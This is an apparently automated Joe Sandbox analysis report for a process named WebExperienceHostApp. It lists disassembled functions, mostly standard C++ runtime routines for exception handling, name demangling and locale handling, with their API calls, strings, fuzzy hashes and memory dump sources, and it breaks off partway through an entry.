Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_setw$Xp_setn$Xp_addx$iswspaceiswxdigit
String ID:
API String ID: 3781602613-0
Opcode ID: b37f4c65fcaae6089a39f6864dfb20dfbddd16cc03fc4d6b826aaf6d26e5b500
Instruction ID: 912bea205847efb2e76c5a2af55e3e52557c0ce96e0cdd725fda741d29bb3bf0
Opcode Fuzzy Hash: b37f4c65fcaae6089a39f6864dfb20dfbddd16cc03fc4d6b826aaf6d26e5b500
Instruction Fuzzy Hash: F6619222F0A5429AE711EBA2D4802FD2731AB58748F594237DF4D63BADDE3CE54AC740

Function 00007FFE1A4585D8 Relevance: 15.2, APIs: 10, Instructions: 150COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4586A2
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4586B2
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4586FE
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45870E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45871E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458791
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4587A2
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4587B4
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4587E0
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4587EF

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: dffebbea1b9ec54e41ee59c5f9df16e35c1e11239b438fd42c02bfbe0f2f9bce
Instruction ID: c3ab234c8ba2c17b2d2f42f6de35a87532acf0762e2c70c749ae20f23c2c1176
Opcode Fuzzy Hash: dffebbea1b9ec54e41ee59c5f9df16e35c1e11239b438fd42c02bfbe0f2f9bce
Instruction Fuzzy Hash: 596182A2F04F5298FB01EBA2D8401FD67B1BB04B98F4044B6DE0D6BA69DF78D565C340

Function 00007FFE1A4531C0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFE1A45335E
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45336B

Part of subcall function 00007FFE1A456770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4523AE), ref: 00007FFE1A45677E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453619
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453664
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A453699

Strings

csm, xrefs: 00007FFE1A453387
csm, xrefs: 00007FFE1A453307
csm, xrefs: 00007FFE1A4532A5

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 211107550-393685449
Opcode ID: 85374f18d14079de111c801c7233a0368ceba0e7784a87de6593dae95347d848
Instruction ID: 2720934917865322a92e3162e89a59b7252580edf4e2103f0972a7e768b05954
Opcode Fuzzy Hash: 85374f18d14079de111c801c7233a0368ceba0e7784a87de6593dae95347d848
Instruction Fuzzy Hash: 8BE194B2B08B818AE710EF36D4902BD7BA0FB45BA8F1441B6DA5D47765CF38E595C700

Function 00007FFE007DAB10 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DAB4D
tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DABEB
memchr.VCRUNTIME140_APP ref: 00007FFE007DABFD
tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DAC38
memchr.VCRUNTIME140_APP ref: 00007FFE007DAC46
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007DACC6

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00007FFE007DABF4, 00007FFE007DAC07
0, xrefs: 00007FFE007DAB88

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: memchrtolower$_errnoisspace
String ID: 0$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3508154992-2692187688
Opcode ID: 28ebbe5085ce22d7c59ed57fe41f67953adc3779f489bac788e36eaca0986cc2
Instruction ID: 097f560fbc5a71e08e2e4fe7032501af5d2551b04f0e6c434085ac425cfc83d5
Opcode Fuzzy Hash: 28ebbe5085ce22d7c59ed57fe41f67953adc3779f489bac788e36eaca0986cc2
Instruction Fuzzy Hash: F351F752A1EAC656EB61AB2495103796BB1BB457A4F4C4032CFDE063BCDF3CA9438712

Function 00007FFE1A45BB38 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45BCEC

Part of subcall function 00007FFE1A458918: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458E23
Part of subcall function 00007FFE1A458918: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A458E5B

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45BC9E

Strings

std::nullptr_t , xrefs: 00007FFE1A45BC2A
cli::array<, xrefs: 00007FFE1A45BC6B
void , xrefs: 00007FFE1A45BBAA
void, xrefs: 00007FFE1A45BB82
cli::pin_ptr<, xrefs: 00007FFE1A45BCB5
std::nullptr_t, xrefs: 00007FFE1A45BC17

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 2943138195-2239912363
Opcode ID: e0836a3629a813ef90ef895af03e740072fc2db4661fc217a7dce682d3bfee39
Instruction ID: a10330f89dbc0a7db8df38c4f346f7b417e6634196aec51df2b7b337e42afdaa
Opcode Fuzzy Hash: e0836a3629a813ef90ef895af03e740072fc2db4661fc217a7dce682d3bfee39
Instruction Fuzzy Hash: 6D514FA2F08F5198FB129B62D8402BC77B0BB09B64F4441F6DA4D13BA9EF7C9165CB04

Function 00007FFE007A6BD0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007A6C24
_CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,00007FFE007A6650,?,?,?,00007FFE007A838D), ref: 00007FFE007A6C35
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007A6C62
std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007A6CA5
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007A6CB6

Strings

ios_base::failbit set, xrefs: 00007FFE007A6BD0, 00007FFE007A6BF8, 00007FFE007A6C79
ios_base::eofbit set, xrefs: 00007FFE007A6BFF, 00007FFE007A6C80
ios_base::badbit set, xrefs: 00007FFE007A6BEC, 00007FFE007A6C40, 00007FFE007A6C6D

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrow$std::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1099746521-1866435925
Opcode ID: a6bf273394677bb2e99abd8e534fce184576f9646bbe71793b055ca8774240fa
Instruction ID: baabd6ae8c19d922860cdc7f680f29afdcfc8abacd30344ba918b10c1bd5f070
Opcode Fuzzy Hash: a6bf273394677bb2e99abd8e534fce184576f9646bbe71793b055ca8774240fa
Instruction Fuzzy Hash: D821ACA2A1F50695EA54BB00D8826F92321AFD1744FAC4035E74E467BEEF3DE64AC350

Function 00007FFE007B7140 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007DBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB00
Part of subcall function 00007FFE007DBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB08
Part of subcall function 00007FFE007DBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB11
Part of subcall function 00007FFE007DBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB2D

_W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007B7182
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007B71A2
_W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007B71C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007B71E0

Part of subcall function 00007FFE007A4D90: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007B71DD,?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007A4DB9
Part of subcall function 00007FFE007A4D90: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007B71DD,?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007A4DE8
Part of subcall function 00007FFE007A4D90: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFE007B71DD,?,?,?,?,?,?,?,?,?,00007FFE007BB15E), ref: 00007FFE007A4DFF

Strings

:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFE007B71AC
:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FFE007B71EA
:AM:am:PM:pm, xrefs: 00007FFE007B71FA
JBz, xrefs: 00007FFE007B7188

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday$JBz
API String ID: 1539549574-1546691460
Opcode ID: 23b0d397a768917b381d48ffc544097c40ac7a10155b45c2e50111aa9d8ed0a0
Instruction ID: 8878511133dd88791e2df5f19985f2fc3e704490374e2cf8c89657072c17b710
Opcode Fuzzy Hash: 23b0d397a768917b381d48ffc544097c40ac7a10155b45c2e50111aa9d8ed0a0
Instruction Fuzzy Hash: 60211E22A0AF4586EA10EF25E84027977B0FB85B84F484135DB4E53769DF7CE541C740

Function 00007FFE007E9E80 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 171COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007EA08E
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007EA09F
std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007EA0E2
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007EA0F3

Strings

ios_base::failbit set, xrefs: 00007FFE007EA062, 00007FFE007EA0B6
ios_base::eofbit set, xrefs: 00007FFE007EA069, 00007FFE007EA0BD
ios_base::badbit set, xrefs: 00007FFE007EA056, 00007FFE007EA0AA

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: 9cb79d3691d168e0564d9f4c501592dad693ea5c078e9f50b8527a96bed53c60
Instruction ID: 0608a4f806ab032e380aff156a933da854fdfa695d19b26fd7f32a556b7f7d2c
Opcode Fuzzy Hash: 9cb79d3691d168e0564d9f4c501592dad693ea5c078e9f50b8527a96bed53c60
Instruction Fuzzy Hash: 1061AE22A0AA8695EB64EF19D4903B96760FB84F84F498036DB4E477BDDF3DE446C301

Function 00007FFE007B4BB0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166fileCOMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007B4C54
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007B4C65
fputwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007B4D41
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007B4DCD

Strings

ios_base::failbit set, xrefs: 00007FFE007B4C28
ios_base::eofbit set, xrefs: 00007FFE007B4C2F
ios_base::badbit set, xrefs: 00007FFE007B4C1D

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowfputwcfwritestd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1428583292-1866435925
Opcode ID: a7380e94e6d0c0f3b865c1dec62774918b944c1c4d491e2328d2bb9d19e9cd10
Instruction ID: 0dd98cf852584adbad8dc5e43c51e0ad893b7ad8f3feda8ec3917474bb8db5b3
Opcode Fuzzy Hash: a7380e94e6d0c0f3b865c1dec62774918b944c1c4d491e2328d2bb9d19e9cd10
Instruction Fuzzy Hash: 2961AC7360AA8695EB50EF25D4803B933A0FB44B88F894032EB4D57769DF3CE556C310

Function 00007FFE1A455F4A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456430: RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE1A456474
Part of subcall function 00007FFE1A456430: RaiseException.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFE1A4564BA

RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE1A455FE7
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00007FFE1A456043

Strings

Access violation - no RTTI data!, xrefs: 00007FFE1A455F4A, 00007FFE1A45616B
Attempted a typeid of nullptr pointer!, xrefs: 00007FFE1A456125
Bad read pointer - no RTTI data!, xrefs: 00007FFE1A456148
Bad dynamic_cast!, xrefs: 00007FFE1A4560B2

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
API String ID: 1852475696-928371585
Opcode ID: 6b9ef99d590b32f0c659d059e5f7edc288c3d0282fa246750663d343d086c454
Instruction ID: 4e729158b9f59a2232d5175d0163cfec34462fb552acc51ae75a749e8f4c9e9b
Opcode Fuzzy Hash: 6b9ef99d590b32f0c659d059e5f7edc288c3d0282fa246750663d343d086c454
Instruction Fuzzy Hash: B551B1A2B19E4692DE60EB66E4906B9A360FF44FA8F4441B3DA4D43775EF3CE125C340

Function 00007FFE007E9C20 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 160COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007E9E13
_CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE007DCB58), ref: 00007FFE007E9E24
std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007E9E67
_CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE007DCB58), ref: 00007FFE007E9E78

Strings

ios_base::failbit set, xrefs: 00007FFE007E9DE7, 00007FFE007E9E3B
ios_base::eofbit set, xrefs: 00007FFE007E9DEE, 00007FFE007E9E42
ios_base::badbit set, xrefs: 00007FFE007E9DDB, 00007FFE007E9E2F

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: 36d0e9059c3f7a5d91012be966453ad462b8d1acf47367d5311b1a054c73d7d8
Instruction ID: f4764eeb492f9d104517d219a8a6a7b015b4357fe75848f86c5508003dcb2cc0
Opcode Fuzzy Hash: 36d0e9059c3f7a5d91012be966453ad462b8d1acf47367d5311b1a054c73d7d8
Instruction Fuzzy Hash: 23617C23A0AA8685EB64EB15D8903B97760FB84F88F598036CB4E473BDDF2CD546C340

Function 00007FFE007DA900 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DA94A
tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DA9DC
memchr.VCRUNTIME140_APP ref: 00007FFE007DA9EE
tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007DAA23
memchr.VCRUNTIME140_APP ref: 00007FFE007DAA31
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007DAAAF

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00007FFE007DA9E5, 00007FFE007DA9FB

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: memchrtolower$_errnoisspace
String ID: 0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3508154992-4256519037
Opcode ID: c43dd37b695d77a9b309dd68fdeaa8cc30da9b2a4874080a3472f04000c7b43e
Instruction ID: 95c625b274ab0881b8faf53c8ad3dd6acc33c05c5c65334ae25fa9ea95dd50b4
Opcode Fuzzy Hash: c43dd37b695d77a9b309dd68fdeaa8cc30da9b2a4874080a3472f04000c7b43e
Instruction Fuzzy Hash: 8C510A12A0EB8656E7216E2595103797AA0BF85B94F0D8132CFDD463ACDE3CE942C702

Function 00007FFE007AB0F0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007AB181
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007AB192
std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007AB287
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007AB298

Strings

ios_base::failbit set, xrefs: 00007FFE007AB155, 00007FFE007AB25B
ios_base::eofbit set, xrefs: 00007FFE007AB15C, 00007FFE007AB262
ios_base::badbit set, xrefs: 00007FFE007AB14A, 00007FFE007AB250

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: 4b79d5893f130ff8fdc1ea0ab7b7df0118dd7d56f78d91c6625c63aa5aa301b0
Instruction ID: 58f0d1416944c19bac9389f62c9668282a5189fbc7e1674b320d3923a5dd563c
Opcode Fuzzy Hash: 4b79d5893f130ff8fdc1ea0ab7b7df0118dd7d56f78d91c6625c63aa5aa301b0
Instruction Fuzzy Hash: 52517062A0AD4981EB54EB19D4D02B96760FF85F88F584136EB1E877BADF3CE945C300

Function 00007FF619495204 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

__std_exception_copy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,00007FF61949505F,?,?,00000000,00007FF6194932B7), ref: 00007FF61949526A
_CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,00007FF61949505F,?,?,00000000,00007FF6194932B7), ref: 00007FF619495286
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF61949505F,?,?,00000000,00007FF6194932B7), ref: 00007FF61949528C
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FF61949505F,?,?,00000000,00007FF6194932B7), ref: 00007FF619495299
_CxxThrowException.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,00007FF61949505F,?,?,00000000,00007FF6194932B7), ref: 00007FF6194952D0

Strings

length, xrefs: 00007FF61949524F
bad allocation, xrefs: 00007FF6194952AB

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionHeapThrow$AllocProcess__std_exception_copy
String ID: bad allocation$length
API String ID: 1592919366-1253776366
Opcode ID: ad62b17777bdb2592f32d953bdb081b6088459a80fef08f55ac007a4efa72339
Instruction ID: c3eb0ff6d07aff3f3eef84cb9b5aa28ff52c37d666f108a31a30c28101e53e00
Opcode Fuzzy Hash: ad62b17777bdb2592f32d953bdb081b6088459a80fef08f55ac007a4efa72339
Instruction Fuzzy Hash: 85313821F15F0299FB00CF64E9401A937A0FB8CB6CB54423ADA4C97765EF38E1A6C740

Function 00007FFE007D1CE4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

